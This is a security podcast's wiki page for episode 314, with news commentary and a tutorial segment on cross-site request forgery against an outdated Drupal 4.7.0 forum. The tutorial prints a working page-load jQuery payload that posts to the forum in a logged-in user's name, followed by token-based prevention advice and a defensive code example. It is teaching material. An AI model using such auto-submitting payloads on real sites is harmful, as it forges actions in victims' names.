Difference between revisions of "Episode314"

From Security Weekly Wiki
 
# Does state sponsored hacking really go on, does it change anything, and does it really matter?
 
 
# Do targeted attacks happen to everyone? What can we do to prevent them? How much resources should you dedicate to protecting from targeted attacks?
 
 
= Technical Segment - Cross-Site Request Forgery (CSRF or XSRF) =
 
 
Yeah, CSRF has been discussed on PaulDotCom a few times before ([http://pauldotcom.com/wiki/index.php/Finding_%26_Exploiting_CSRF_Vulnerabilities check out the new and growing technical library]) and [https://www.youtube.com/watch?v=nqFzab1si8g John has done videos on it]. But it's back. We're not showing you anything new or revolutionary, as this was Patrick the Intern's first project: to get acquainted with the attack, learn how it works and set up a working exploit. For this, we're using a very old (6+ years) version of Drupal, version 4.7.0 to be specific. This vulnerability has long been fixed, and if you use Drupal's own forms API, you should not have to worry about CSRF in your Drupal sites.
 
 
If you want history and background on CSRF, like the "confused deputy" story and links, check out Paul's tech segment on it from [http://pauldotcom.com/wiki/index.php/Episode82 Episode 82]. In a nutshell, this attack lets us use an authenticated user's session to perform some action on a site, in this case a message board. Our message board is set up with permissions so that only users with valid credentials may post to the board. Anyone in the world can read the board, but you need a username and password to post. With CSRF, if we're able to merely get an authenticated user to open a web page, we are able to post what we want to the forum. Here's how it works:
 
 
Because we have access to the form, we can view the source and get the necessary information, which is the form's action and the form's variables that need to be sent with the request. For my forum, this is what it looks like, with some unimportant parts removed, like visual styling.
 
<pre>
&lt;form action="/drupal-4.7.0/?q=node/add/forum/2" method="post"&gt;

&lt;input type="hidden" name="edit[form_id]" id="edit-form_id" value="forum_node_form" /&gt;

Forums:
&lt;select name="edit[taxonomy][1]"&gt;
&lt;option value="1"&gt;Hacking&lt;/option&gt;
&lt;option value="2"&gt;-CSRF&lt;/option&gt;
&lt;option value="3"&gt;-XSS&lt;/option&gt;
&lt;option value="4"&gt;-SQLi&lt;/option&gt;
&lt;/select&gt;

Subject:
&lt;input type="text" name="edit[title]" id="edit-title" size="60" /&gt;

Body:
&lt;textarea cols="60" rows="20" name="edit[body]"&gt;&lt;/textarea&gt;

Publishing options
&lt;input type="checkbox" name="edit[status]" value="1" /&gt; Published
&lt;input type="checkbox" name="edit[moderate]" value="1" /&gt; In moderation queue
&lt;input type="checkbox" name="edit[promote]" value="1" /&gt; Promoted to front page
...

&lt;input type="submit" name="op" value="Submit" class="form-submit" /&gt;
&lt;/form&gt;
</pre>
 
 
We see that we need to create a web page that will send a request to /drupal-4.7.0/?q=node/add/forum/2 to add a post to the forum with a taxonomy value of 2. Additionally, we need to send the Subject and Body of the post we want to have published. One part that is easily overlooked, and we sometimes see this on various sites, is the publishing option: if the attacker does not send the correct one, the message is left in moderation mode. We'll want to include the "Published" editing status as well, to make sure our post is immediately visible. Lastly, we need to send the "op" of Submit, so the server will think the user submitted this request.
 
 
Now, we need to get an authenticated user to send the request via an HTTP POST. One thing we can do is build a form that has all of these values in hidden HTML &lt;input&gt; fields and then ask the user to click the button for some reason. No intelligent user is going to click the button on a form that some anonymous person sends them. So we need to step this up a bit.
 
 
It's not as hard to get someone to simply load a page as it is to get them to click a button on a page. So instead, we're going to add some JavaScript, using jQuery, and send off a POST request when the page loads. Here's the code for that:
 
 
<pre>
&lt;head&gt;
&lt;script src="//ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js"&gt;&lt;/script&gt;

&lt;script&gt;
// Called from the body's onLoad handler: sends the forum form's fields as a POST
function hackMe(){
  $.post("/drupal-4.7.0/?q=node/add/forum/2", {
    'edit[title]': "Cheap Viagra! Free Porn!",
    'edit[taxonomy][1]': "2",
    'edit[body]': "Proof of concept of CSRF! PaulDotCom Rules! Hack Naked!",
    'edit[form_id]': "forum_node_form",
    'edit[status]': "1",
    'op': "Submit"
  });
}
&lt;/script&gt;
&lt;/head&gt;
&lt;body onLoad="hackMe()"&gt;
&lt;/body&gt;
</pre>
 
 
Now, we just need to get an authenticated user to load the page we've created and there we have it, the user has posted to the forum for us.
 
 
=== Prevention ===
 
 
CSRF is prevented by the use of session tokens. When the user first authenticates, a token is created and placed in that user's session. Every time the user accesses a page with a form, that token is added to the form, and when the form is submitted the session's token is compared to the value in the form request. Now when we look at the source of the form, we will not see the token for the authenticated user, so we can't include it in our request, and when the user loads our page, the server will reject the request.
 
 
For more information on the prevention, check out the frameworks and explanations [https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet#Prevention_Frameworks offered by OWASP]
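
The token check described above, as an added Node.js example; it is not Drupal's code and not part of the original segment. The function names, the in-memory session object and the <code>edit[token]</code> field name are assumptions made for the illustration.

```javascript
// Added example (not Drupal's code): per-session CSRF token for the forum form.
const crypto = require("crypto");

// Called once when the user authenticates; the token lives in the server-side session.
function startSession(user) {
  return { user, csrfToken: crypto.randomBytes(32).toString("hex") };
}

// Every rendered form carries the session's token in a hidden field.
// "edit[token]" is a field name made up for this example.
function renderForumForm(session) {
  return '<form action="/drupal-4.7.0/?q=node/add/forum/2" method="post">' +
    `<input type="hidden" name="edit[token]" value="${session.csrfToken}" />` +
    '<input type="text" name="edit[title]" />' +
    '<input type="submit" name="op" value="Submit" /></form>';
}

// Constant-time comparison; timingSafeEqual throws on unequal lengths, so check first.
function tokenMatches(expected, supplied) {
  if (typeof expected !== "string" || typeof supplied !== "string") return false;
  const a = Buffer.from(expected), b = Buffer.from(supplied);
  return a.length === b.length && crypto.timingSafeEqual(a, b);
}

// Server-side handler for the POST: reject before touching any post data.
function handleForumPost(session, fields) {
  if (!session) return { status: 403, reason: "not authenticated" };
  if (!tokenMatches(session.csrfToken, fields["edit[token]"])) {
    return { status: 403, reason: "missing or invalid CSRF token" };
  }
  return { status: 200, postedBy: session.user, title: fields["edit[title]"] };
}

// Constructed demo data: the field set of a cross-site request, which carries no token.
const session = startSession("alice");
const forged = { "edit[title]": "forged subject", "edit[taxonomy][1]": "2",
                 "edit[form_id]": "forum_node_form", "edit[status]": "1", op: "Submit" };
// The genuine submission takes the token out of the form the server rendered.
const token = /name="edit\[token\]" value="([0-9a-f]+)"/.exec(renderForumForm(session))[1];
const genuine = { ...forged, "edit[title]": "real subject", "edit[token]": token };

console.log(handleForumPost(session, forged));   // rejected with 403
console.log(handleForumPost(session, genuine));  // accepted with 200
```

The request without a token is refused even though it arrives with the user's valid session, and a token issued to one session is not accepted for another.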
 
 
=== Stateless ===
 
 
Additionally, [http://appsandsecurity.blogspot.com/2012/01/stateless-csrf-protection.html John Wilander has talked about Stateless CSRF], which is interesting and I wanted to mention it, but I'm still working through the mechanics of it all. Basically the way I understand it, it's an alternative to a CAPTCHA. Possibly, we'll go over this in a future segment.
 
  
 
== Paul's Stories ==
 

Revision as of 02:42, 4 January 2013


Episode Media

Episode 314

MP3

Announcements & Shameless Plugs

PaulDotCom Security Weekly - Episode 314 for Thursday January 3rd, 2013

  • Tom Clancy's new book, Threat Vector, makes mention of a Hack Naked T-shirt
  • Welcome our latest official sponsor, The SANS Institute! You will be hearing a lot more about some of the different programs and curriculums at SANS over the course of next year.

Check out our last year:

Adam Shostack Jeremiah Grossman Dan Geer Alan Paller Dr. Anton Chuvakin Thomas Ptacek Marcus Sachs Kevin Finisterre Nick Farr Gene Kim

Episode 300

  • Please subscribe to the PaulDotCom Insider Newsletter for all things PaulDotCom, discounts on training, and updates on cool stuff we're doing (like looking for people to help, take people under our wings and teach them security, etc...)
  • We are in the process of archiving and cataloging our technical segments, please visit the PaulDotCom Technical Library. We are also working on updating all of the articles, so check the newsletter or if you want to help in exchange for some free guidance and security training please email me.

Interview: Eric Cole

  1. Does state sponsored hacking really go on, does it change anything, and does it really matter?
  2. Do targeted attacks happen to everyone? What can we do to prevent them? How much resources should you dedicate to protecting from targeted attacks?

Paul's Stories

  1. Ban on demanding Facebook passwords among new 2013 state laws | Reuters - I would be totally creeped out if my employer asked for my Facebook password. Does that even need to be a law?
  2. Security flaw found in app used for 'safe sexting' - Why is it that people just love to expose themselves on the Internet? Snapchat, Wickr and other apps such as Facebook's Poke have become popular among teens who believe they are a "safe" way to send explicit pictures of themselves to friends. The reason they believe these apps are safe is because videos and texts sent via them are deleted after a short period of time determined by the sender. Get this though, the app would leak the email address based on a bad password (you need to just know the username), also you could see who the person had been sexting with by visiting a URL based on the username. I guess that's what happens when you let your fourth grader be in charge of web app security.
  3. NYC mayor pins crime rate spike on iPhone - I can't even believe I read this, what a backwards view on security..
  4. Hacker at Public Works went unnoticed for days - Tell me this is not a page right out of one of your pen tests. This is somehow news?
  5. Facebook Patches Webcam Vulnerability After Receiving Hacker Tip - Took them 4 months to fix it, ouch! In the meantime, millions of people were spied on while typing in front of their computer, OMG the horror!
  6. Best Book Bejtlich Read in 2012 - Always love to buy the books on his list, so everyone should go out and buy SSH Mastery by Michael W Lucas and For the President's Eyes Only: Secret Intelligence and the American Presidency from Washington to Bush by Christopher Andrew.
  7. Microsoft Rushes Out ‘Fix It’ For Internet Explorer 0-day Exploit - I guess we will never stop hearing about IE 0-Day.
  8. Security Researcher Compromises Cisco VoIP Phones With Vulnerability - Dark Reading - This is one of the best hacks I've seen in some time. I think some of the stuff we talk about is cool, but not-so-practical. This allows you to tap into people's phones and turn them into listening devices. Now that's interesting!
  9. c0decstuff: Defeating Windows 8 ROP Mitigation - The cat and mouse game between attackers and Microsoft has always been a battle. However, over the years exploits are harder to write, and time will tell if we've hit a plateau. What if Microsoft really can't make it more difficult for attackers to exploit vulnerabilities? What if we can't add to the time it takes to exploit stuff?
  10. Metasploit: 5 Tips to Ensure Safe Penetration Testin - I completely disagree with the analogy that vulnerabilities are just "unintentional APIs". That is a ridiculous claim. Vulnerabilities are weaknesses, and accessing them is usually going against the way the program was intentionally written. It also sometimes causes something to crash, for example a buffer overflow is sorta like a controlled crash. The lines between what is a "reliable" exploit and what is not are blurry. There are many factors that will change the behavior of an exploit (esp. ones that involve any type of memory manipulation, as memory is volatile if you can remember that from your first computer course). There are really only two categories of reliability, ones that allow commands to run without causing a crash and those that don't. And really what I mean is that command execution in a web app is almost always more reliable than a buffer overflow or memory corruption. However, fingerprinting the target is extremely important, get that wrong and you could just crash the system anyhow.
  11. Celebrity hacker gets ten years - This story caught my eye for a few reasons. One, Scarlett Johansson is smoking hot and I just watched the Avengers (Which I really liked). Okay, so this guy used the tried and true method of hacking the security question to change the password on someone's account. We really need to do a better job of educating people about the security question, it's really just another password and should be treated as such. Google two-factor authentication is the way to go and will prevent this type of attack, implement it on all your systems now. As penetration testers we do the same thing, recon and guess passwords and/or "secret" questions (more like "secret" answers). The hacker did other things like forward all of your email to him. This may sound like a fun and easy thing to do in order to kill a weekend, but it landed him 10 years in prison (not so fun unless you're into being shanked and raped).

Larry's Stories

DEFCON Documentary Sneak preview - [Larry] - Should be neat. 20 years in the making. Jason Scott and crew have released a 20 minute tease of the documentary.

IE 0-day - [Larry] - A fix is out… and it only affects IE 6, 7 and 8 (not 9 and 10). This of course is still prevalent in many places where newer browsers are unsupported by certain mission critical applications. Sigh. How do developers/vendors get away with this?

Inclusion in Tactical Countermeasures? - [Larry] - Seeding your real data with fake data, then alerting on it when it moves, or gets published elsewhere. Interesting concept. I'd even argue that access of this data should trigger alarms, because just maybe if it is accessed, it is outside of "normal" filtered means.

Patrick's Stories

  1. 5 Tips to Retain Great Security Talent - Motivate, encourage, give treats.
  2. Patent Trolls Are Back - Do you use a fax, scanner or WiFi? Pay up.
  3. Finding svn Files During Pentesting - SANS article by last week's guest, Tim Medin on being able to find source code on servers because developers leave the .svn directories (Subversion version control) on the production server. This allows people to load the source of files in a browser.
  4. 5 Resolutions InfoSec Pros Should Make - By Rafal Los, many of these are probably good for anyone to make, but it's always good to have things to think about for the new year.
  5. Adrian "Irongeek" Crenshaw with two good updates on his site. He keeps a zoo of web shells that he has found and also wrote a long article on security in the academic world

Jack's Stories from the Porch

  1. TurkTrust, a Turkish CA issued some bogus intermediate CAs, and one was used to sign fraudulent google.com certificates. I think this is a Bad Thing.
  2. Outmaneuvered at Their Own Game, Antivirus Makers Struggle to Adapt according to the New York Times. Of course, the headline "Outmaneuvered at Their Own Game, Newspapers Struggle to Adapt" works, too. I love the irony.
  3. Study: 94 Percent of Healthcare Organizations Breached at least according to a Ponemon study (it might be right anyway). And six percent are unaware?
  4. All current versions of the Ruby on Rails Web framework have a SQL injection vulnerability good thing nothing important uses that framework.